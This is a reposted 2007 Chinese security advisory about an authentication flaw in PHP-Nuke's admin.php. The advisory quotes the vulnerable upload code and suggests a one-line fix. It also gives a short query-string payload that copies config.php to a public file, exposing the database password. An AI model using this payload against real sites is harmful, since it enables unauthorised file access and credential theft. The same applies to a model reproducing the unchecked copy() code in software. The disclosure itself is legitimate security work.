PHP-Nuke安全缺陷

发表于:2007-07-02来源:作者:点击数: 标签:
PHP-Nuke是一个开放源码软件,被很多站点用作web论坛。它的admin. php 文件中存在一个 安全 缺陷,攻击者可以通过这个缺陷从系统硬盘的任意位置向另外的位置复制文件,从而获得一些敏感文件的访问权限,甚至将这些文件覆盖。 存在缺陷的版本 PHP-Nuke 5.2以

    PHP-Nuke是一个开放源码软件,被很多站点用作web论坛。它的admin.php文件中存在一个安全缺陷,攻击者可以通过这个缺陷从系统硬盘的任意位置向另外的位置复制文件,从而获得一些敏感文件的访问权限,甚至将这些文件覆盖。

存在缺陷的版本

PHP-Nuke 5.2以及以前的版本

不受影响的版本

只有PHP-Nuke 5.0 RC1

Exploit

以下代码或方法只能用于研究,使用者造成的后果自负

例如:

 

&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt


然后访问刚刚建立的文件:



就可以看到有数据库密码的config.php文件的内容。通过这种方式也可以获得其它的文件。

缺陷代码

缺陷代码在admin.php文件中:


$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name);
$lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
//include("header.php");
//GraphicAdmin($hlpfile);
//html_header();
//displaydir();
$wdir2="/";
chdir($basedir . $wdir2);
//CloseTable();
//include("footer.php");
Header("Location: admin.php?op=FileManager");
exit;


这段代码不检查你是否以admin的身份登录,因此你无须通过验证就可以使用admin.php文件。

解决方案

有一个临时的解决方法就是把


"if($upload) {"


改为:


"if (($upload) && ($admintest)) {"

原文转自:http://www.ltesting.net